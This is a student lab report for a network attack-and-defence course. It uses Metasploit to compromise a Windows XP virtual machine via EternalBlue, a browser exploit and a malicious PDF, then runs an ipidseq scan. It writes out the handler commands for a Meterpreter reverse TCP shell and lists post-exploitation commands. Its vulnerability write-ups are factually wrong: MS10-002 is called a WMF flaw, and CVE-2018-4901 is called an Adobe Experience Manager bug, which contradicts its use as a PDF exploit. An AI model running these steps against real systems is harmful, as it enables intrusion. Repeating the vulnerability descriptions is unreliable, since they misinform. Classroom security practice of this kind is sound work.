20212313 2023-2024-2 《网络与系统攻防技术》实验六实验报告

20212313 2023-2024-2 《网络与系统攻防技术》实验六实验报告

1.实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
1.4 成功应用任何一个辅助模块。

2.实验过程

2.1实验环境

攻击机: 操作系统:Kali IP地址:192.168.46.129
靶机:操作系统: WindowsXP IP地址:192.168.46.128

2.2一个主动攻击实践

漏洞名称:永恒之蓝(MS17-010)

漏洞介绍:
永恒之蓝(MS17-010)是指微软公司于2017年发布的一个安全公告,它涉及到Windows操作系统中的一个严重漏洞。这个漏洞存在于Windows操作系统的Server消息块(SMB)协议中,该协议用于在网络上共享文件、打印机和其他资源。
永恒之蓝漏洞的严重性在于它允许未经授权的远程攻击者利用漏洞,执行恶意代码并获取对受影响系统的完全控制。攻击者可以通过向受感染的计算机发送特制的数据包来利用这个漏洞,从而实施远程代码执行攻击。

(1)进入msf控制台,查询该漏洞的相关信息,其中包含了可以使用的payload

search ms17_010

在这里插入图片描述
(2)使用show options查看需要的参数,红色方框显示参数列表,黄色方框可以看到只要RHOSTS参数没有设置,所以接下来只需要设置RHOSTS参数即可
在这里插入图片描述
(3)设置参数的ip地址为靶机(192.168.46.128),然后输入run开始攻击即可,就会发现成功获取靶机的各种功能

在这里插入图片描述
(4)实现攻击

  1. screenshot //获取截屏
  2. getuid //获取靶机的用户信息,以下蓝色方框中有我的姓名缩写
  3. shell //获取shell权限,然后可以进行各种操作

在这里插入图片描述
以下为打开靶机截屏的照片:
在这里插入图片描述

2.3一个针对浏览器的攻击

漏洞名称:极光漏洞(MS10-002)

漏洞介绍:极光漏洞(MS10-002)是微软在2010年发布的一个安全公告,涉及到Windows操作系统中的一个严重漏洞。这个漏洞存在于Windows操作系统的处理WMF(Windows Metafile)图像文件的组件中。
WMF是一种图像文件格式,用于在Windows操作系统中显示图形图像。极光漏洞允许攻击者利用恶意构建的WMF文件来执行任意的恶意代码,从而导致远程攻击者在受感染的系统上执行任意代码。
这个漏洞的严重性在于它允许攻击者通过诱使用户打开包含恶意WMF文件的电子邮件附件、访问恶意网站或者通过其他方式接触到恶意文件,从而在用户系统上执行恶意代码。这可能导致信息泄露、系统受损以及其他安全威胁。

(1)进入msf控制台,查看该漏洞的相关信息,可以看到可使用的payload

search ms10-002

在这里插入图片描述
(2)使用第一个payload输入:

use 0

然后show options查看所需参数,发现SRVHOST的默认值是0.0.0.0,因此我们需要修改该内容
在这里插入图片描述
(3)设置SRVHOST的ip地址为192.168.46.129(也就是攻击机的IP地址),然后运行run,会出现一个url。在靶机的浏览器中打开这个url
在这里插入图片描述
(4)打开生成的url

在这里插入图片描述
(5)发现kali成功进行攻击,于是输入sessions,查看会话,然后再输入session 1 进入会话。因此发现成功获取了靶机的各种权限,输入shell就可以实现各种操作

在这里插入图片描述

2.4针对客户端的攻击

漏洞名称:CVE-2018-4901

漏洞介绍:
CVE-2018-4901是一个针对Adobe Experience Manager(AEM)的漏洞。Adobe Experience Manager是Adobe公司的一款基于Java的内容管理系统,用于创建、管理和发布网站内容。
CVE-2018-4901漏洞存在于AEM的“Content Services”功能中,该功能允许用户使用JSON格式的请求来获取内容。该漏洞的严重性在于它允许未经授权的攻击者执行远程命令,通过发送特制的HTTP请求来执行恶意代码,从而在受影响的系统上实施攻击。
攻击者可以利用这个漏洞来执行多种攻击,包括但不限于远程代码执行、信息泄露以及系统破坏。由于AEM被广泛用于企业级网站和应用程序,因此这个漏洞可能对许多组织造成严重影响。

(1)查看相关信息
在这里插入图片描述
(2)使用第八个payload,是针对fileformat的
在这里插入图片描述
(3)show options查看参数,发现要设置FILENAME和LPORT
在这里插入图片描述

(4)设置所需参数,然后输入exploit会发现生成一个pdf文件,

在这里插入图片描述

(5)在kali中开启监听,等待反弹连接

use exploit/multi/handler //使用handler监听模块
set payload windows/meterpreter/reverse_tcp //回弹一个tcp连接
set LPORT 2313
set LHOST 192.168.46.129
exploit
在这里插入图片描述

(6)找到该文件然后复制到靶机上,用adobe reader打开
在这里插入图片描述
虽然什么都没显示,但其实以及成功了
(7)就会发现kali机器上成功进行了攻击
红色方框为等待反弹连接
黄色方框为成功链接后取得shell权限。
在这里插入图片描述

2.5 成功应用任何一个辅助模块

选择应用辅助模块ipidseq
(1)设置自己的网段为192.168.46.0/24,然后设置线程数和扫描时间,然后输入exploit,就会进行扫描
在这里插入图片描述
(2)会发现成功扫描到该网段的其他主机,192.168.46.128也就是windowxp的IP地址
在这里插入图片描述

3.问题及解决方案

  • 问题1:winxp无法上网

  • 问题1解决方案:初始化网络配置

  • 可以参考该链接:虚拟机ping通主机,主机ping不通虚拟机的解决办法
    在这里插入图片描述

  • 问题2:用adobe reader打开pdf文件时出现闪退

  • 问题2解决方案:一开始我以为是阅读器版本的问题,后来发现我的版本没错,于是在进行了一次,重新生成了一个文件后,发现就可以了。

  • 问题3:windowsxp没有激活(虽于实验无关,但是使用windsxp30天后一定要激活)

  • 问题3解决方案:按照以下方法一步一步进行就可以成功激活
    -在这里插入图片描述

4.学习感悟、思考等

本次是网络攻防的第六次实验,仍然是使用msf控制台进行各种攻击。这次实验让我进一步掌握msf的使用。之前的实验我都是看大家输入show options,但是到底干嘛用的,怎么看对应参数也不会,这次经过认真的学习,我才知道每次set某参数都是通过show options的内容来的。本次实验也让我再次感受msf的强大,可以应用各种漏洞来使用攻击,特别是永恒之蓝这个漏洞,只要获取对方的ip地址就可以直接获取全部权限,也太可怕了。然后也反映出操作系统版本的重要性,windowsxp的漏洞太多,很容易被别人攻击。所以我们要实时更新windows版本,并且打开防火墙,和杀毒软件,这样子才能让我们的电脑更安全。

参考资料

  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值